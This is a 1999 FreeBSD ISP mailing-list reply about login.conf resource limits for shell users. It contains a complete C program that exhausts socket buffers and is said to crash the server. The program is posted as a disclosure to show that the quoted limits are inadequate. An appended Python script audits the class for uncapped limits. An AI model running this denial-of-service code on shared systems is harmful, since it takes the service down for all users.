Date: Thu, 4 Nov 1999 23:36:03 -0500 (EST)
From: <up@3.am>
To: Mike Tancsa <mike@sentex.net>
Cc: freebsd-isp@freebsd.org
Subject: Re: login.conf and resource limits
Message-ID: <Pine.GSO.4.10.9911042331170.8377-100000@richard2.pil.net>
In-Reply-To: <38224635.260144868@mail.sentex.net>

I got news for you, that ain't going to stop the DoS.  Compile and run
this code as a user from your shellu class.  It will crash your server, so
don't do it on a production box (BTW, I had checked the security list
archives and saw a thread on this, but no answers that worked):

#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>

#define BUFFERSIZE 204800

extern int
main(void)
{
        int p[2], i;
        char crap[BUFFERSIZE];

        while (1) {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }
        exit(0);
}

On Fri, 5 Nov 1999, Mike Tancsa wrote:

> On 4 Nov 1999 21:00:01 -0500, in sentex.lists.freebsd.isp you wrote:
>
> >
> >This is what I came up with after checking out the man pages and examples
> >in login.conf.  If someone who's addressed this has a good example default
> >config, that would be very helpful.
>
> shellu:\
>         :cputime=infinity:\
>         :datasize-cur=8M:\
>         :datasize-max=8M:\
>         :stacksize-cur=4M:\
>         :stacksize-max=4M:\
>         :memorylocked-cur=10M:\
>         :memorylocked-max=10M:\
>         :memoryuse-cur=10M:\
>         :memoryuse-max=10M:\
>         :filesize=infinity:\
>         :coredumpsize=infinity:\
>         :maxproc-cur=5:\
>         :maxproc-max=5:\
>         :openfiles-cur=64:\
>         :openfiles-max=64:\
>         :priority=0:\
>         :requirehome@:\
>         :umask=022:\
>         :tc=auth-defaults:
>
> is what I use for my casual shell users... Don't forget
>
> cap_mkdb /etc/login.conf
>
>         ---Mike
> Mike Tancsa  (mdtancsa@sentex.net)
> Sentex Communications Corp,
> Waterloo, Ontario, Canada
> "Given enough time, 100 monkeys on 100 routers
> could setup a national IP network."  (KDW2)
>

James Smallacombe                      PlantageNet, Inc. CEO and Janitor
up@3.am                                                      http://3.am
=========================================================================
ISPF 3 - The Forum for ISPs by ISPs(tm) || Nov 15-17, 1999, New Orleans
3 days of clues, news, and views from the industry's best and brightest.
Visit <http://www.ispf.com/> for information and registration.
=========================================================================

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-isp" in the body of the message
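
Added example (not part of the original message, and not FreeBSD's own code): a small parser for the shellu class quoted above that lists which resource limits the class leaves without a finite hard cap. It shows why the class does not cover the posted test program: openfiles limits the number of descriptors, not the bytes buffered behind each socket, and no socket buffer limit is set. Assumptions: the checklist is taken from login.conf(5), including sbsize (the socket buffer limit), and tc= inheritance is not followed.

```python
import re

# The shellu class as quoted in the message above.
SAMPLE = r"""shellu:\
        :cputime=infinity:\
        :datasize-cur=8M:\
        :datasize-max=8M:\
        :stacksize-cur=4M:\
        :stacksize-max=4M:\
        :memorylocked-cur=10M:\
        :memorylocked-max=10M:\
        :memoryuse-cur=10M:\
        :memoryuse-max=10M:\
        :filesize=infinity:\
        :coredumpsize=infinity:\
        :maxproc-cur=5:\
        :maxproc-max=5:\
        :openfiles-cur=64:\
        :openfiles-max=64:\
        :priority=0:\
        :requirehome@:\
        :umask=022:\
        :tc=auth-defaults:"""
# Assumed audit checklist: resource limits named in login.conf(5).
EXPECTED = ("cputime", "datasize", "stacksize", "memoryuse", "memorylocked",
            "maxproc", "openfiles", "sbsize", "filesize", "coredumpsize")
UNLIMITED = {"infinity", "inf", "unlimited", "unlimit"}

def parse_class(text):
    """Return (name, {capability: value}); tc= inheritance is not followed."""
    joined = re.sub(r"\\\s*\n\s*", "", text.strip())  # undo line continuations
    name, *fields = joined.split(":")
    caps = {}
    for field in filter(None, (f.strip() for f in fields)):
        if field.endswith("@"):
            caps[field[:-1]] = None          # capability explicitly cancelled
        else:
            key, _, value = field.partition("=")
            caps[key] = value or True        # bare name is a boolean
    return name, caps

def uncapped(caps):
    """Resources whose hard limit is absent or infinite in this class."""
    hard = lambda r: caps.get(r + "-max", caps.get(r))
    return [r for r in EXPECTED if hard(r) is None or str(hard(r)).lower() in UNLIMITED]

if __name__ == "__main__":
    name, caps = parse_class(SAMPLE)
    print(name, "leaves uncapped:", ", ".join(uncapped(caps)))
```

After changing a class, rebuild the capability database with cap_mkdb /etc/login.conf, as the quoted reply notes.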